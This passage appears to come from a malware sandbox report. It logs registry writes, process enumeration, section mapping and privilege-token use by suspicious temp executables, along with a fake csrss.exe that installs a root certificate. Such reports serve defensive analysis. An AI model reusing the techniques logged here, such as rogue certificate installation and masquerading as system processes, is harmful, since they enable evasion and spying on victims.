Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CFEDE031-67B6-11EE-A42E-EEDB236BE57B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30deaea7c3fbd901 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403739529" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f908080c5c8cf442941c5db076e34ac200000000020000000000106600000001000020000000f9d1625a6edecb613ac4ddc1108a57b604fcfbf70162156663218abfaac5d64b000000000e80000000020000200000006afde4f671ccc90b605936f80141c95afacf872631183674585daef85ad7175420000000bb50b9d71f31bfb29738cebff6b68030fb1508b4623714575f0e7ba856a57cbb400000007d8261ab03df51c3add616b020eaff8838ec8ad0763f236457f084e15f6eb8ad597cc88992287b7b62e4171c56b3bf8ece1f4ebbd029cb899412d505bbb43e6c | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DE09.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

